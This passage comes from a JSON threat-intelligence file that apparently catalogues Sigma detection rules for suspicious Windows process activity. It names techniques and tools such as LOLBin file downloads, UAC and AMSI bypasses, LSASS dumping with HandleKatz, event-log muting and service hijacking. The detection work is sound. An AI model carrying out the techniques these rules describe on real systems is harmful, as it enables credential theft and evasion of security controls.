[ { "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", "value": "Data Copied To Clipboard Via Clip.EXE" }, { "description": "Download and compress a remote file and store it in a cab file on local machine.", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", "value": "Suspicious Diantz Download and Compress Into a CAB File" }, { "description": "Detects execution of chromium based browser in headless mode using the \"dump-dom\" command line to download files", "meta": { "author": "Sreeman, Florian Roth (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "value": "File Download with Headless Browser" }, { "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-12-04", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_sysmoneop.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/SysmonEoP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml" ], "tags": [ "cve.2022-41120", "attack.t1068", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "value": "HackTool - SysmonEOP Execution" }, { "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", "meta": { "author": "bohops", "creation_date": "2022-10-30", "falsepositive": [ "False positives depend on custom use of vsls-agent.exe" ], "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1583916360404729857", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "43103702-5886-11ed-9b6a-0242ac120002", "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" }, { "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "236d8e89-ed95-4789-a982-36f4643738ba", "value": "Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script" }, { "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "creation_date": "2019-10-24", "falsepositive": [ "Unknown sub processes of Wsreset.exe" ], "filename": "proc_creation_win_uac_bypass_wsreset.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ReaQta/status/1222548288731217921", "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", "https://www.activecyber.us/activelabs/windows-uac-bypass", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "value": "Bypass UAC via WSReset.exe" }, { "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "meta": { "author": "frack113", "creation_date": "2021-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_winzip_password_compression.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" }, { "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://redcanary.com/blog/raspberry-robin/", "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", "value": "Suspicious Usage Of ShellExec_RunDLL" }, { "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", "meta": { "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "creation_date": "2019-10-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_run_script_from_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_ads.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "value": "Run PowerShell Script from ADS" }, { "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_service_imagepath_change.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" ], "tags": [ "attack.persistence", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "value": "Changing Existing Service ImagePath Value Via Reg.EXE" }, { "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92a974db-ab84-457f-9ec0-55db83d7a825", "value": "Potential AMSI Bypass Using NULL Bits" }, { "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/orange_8361/status/1518970259868626944", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "value": "UAC Bypass Using Event Viewer RecentViews" }, { "description": "Detects the execution of a renamed \"NirCmd.exe\" binary based on the PE metadata fields.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2024-03-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_nircmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd.html", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_nircmd.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "264982dc-dbad-4dce-b707-1e0d3e0f73d9", "value": "Renamed NirCmd.EXE Execution" }, { "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "value": "Netsh Allow Group Policy on Microsoft Defender Firewall" }, { "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpevtmute.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/bats3c/EvtMute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "value": "HackTool - SharpEvtMute Execution" }, { "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_sys.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_sys.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "value": "Suspicious Rundll32 Activity Invoking Sys File" }, { "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", "meta": { "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate use of the library for administrative activity" ], "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" ], "tags": [ "attack.execution", "attack.reconnaissance", "attack.discovery", "attack.credential-access", "attack.impact" ] }, "uuid": "c86500e9-a645-4680-98d7-f882c70c1ea3", "value": "AADInternals PowerShell Cmdlets Execution - ProccessCreation" }, { "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_handlekatz.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/codewhitesec/HandleKatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "value": "HackTool - HandleKatz LSASS Dumper Execution" }, { "description": "Detects process execution from a fake recycle bin folder, often used to avoid security solution.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_recycle_bin_fake_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "5ce0f04e-3efc-42af-839d-5b3a543b76c0", "value": "Suspicious Process Execution From Fake Recycle.Bin Folder" }, { "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", "meta": { "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate use to pass password to different powershell commands" ], "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74403157-20f5-415d-89a7-c505779585cf", "value": "ConvertTo-SecureString Cmdlet Usage Via CommandLine" }, { "description": "Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sqlcmd_veeam_db_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "696bfb54-227e-4602-ac5b-30d9d2053312", "value": "Veeam Backup Database Suspicious Query" }, { "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dns_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml" ], "tags": [ "attack.initial-access", "attack.t1133" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "value": "Unusual Child Process of dns.exe" }, { "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "creation_date": "2022-08-08", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_delete_safeboot.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "value": "SafeBoot Registry Key Deleted Via Reg.EXE" }, { "description": "Detects PowerShell execution to set the ACL of a file or a folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_set_acl.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "bdeb2cff-af74-4094-8426-724dc937f20a", "value": "PowerShell Script Change Permission Via Set-Acl" }, { "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-24", "falsepositive": [ "Legitimate use by administrators" ], "filename": "proc_creation_win_pua_nircmd_as_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", "value": "PUA - NirCmd Execution As LOCAL SYSTEM" }, { "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", "meta": { "author": "Maxime Thiebaut (@0xThiebaut)", "creation_date": "2021-10-21", "falsepositive": [ "Legitimate usage of the uncommon Windows Work Folders feature." ], "filename": "proc_creation_win_susp_workfolders.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/elliotkillick/status/1449812843772227588", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", "value": "Execution via WorkFolders.exe" }, { "description": "Detects commandline arguments for executing a child process via dotnet-trace.exe", "meta": { "author": "Jimmy Bayne (@bohops)", "creation_date": "2024-01-02", "falsepositive": [ "Legitimate usage of the utility in order to debug and trace a program." ], "filename": "proc_creation_win_dotnet_trace_lolbin_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1740022869198037480", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9257c05b-4a4a-48e5-a670-b7b073cf401b", "value": "Binary Proxy Execution Via Dotnet-Trace.EXE" }, { "description": "Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", "value": "Arbitrary File Download Via GfxDownloadWrapper.EXE" }, { "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { "author": "frack113", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" ], "tags": [ "attack.collection", "attack.t1119" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", "value": "Recon Information for Export with Command Prompt" }, { "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" ], "tags": [ "attack.lateral-movement" ] }, "uuid": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "value": "Mstsc.EXE Execution From Uncommon Parent" }, { "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", "meta": { "author": "Agro (@agro_sev) oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "It's not an uncommon to use te.exe directly to execute legal TAEF tests" ], "filename": "proc_creation_win_susp_use_of_te_bin.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", "value": "Malicious Windows Script Components File Execution by TAEF Detection" }, { "description": "Detects the enabling of the Windows Recall feature via registry manipulation.\nWindows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" value, or setting it to 0.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2024-06-02", "falsepositive": [ "Legitimate use/activation of Windows Recall" ], 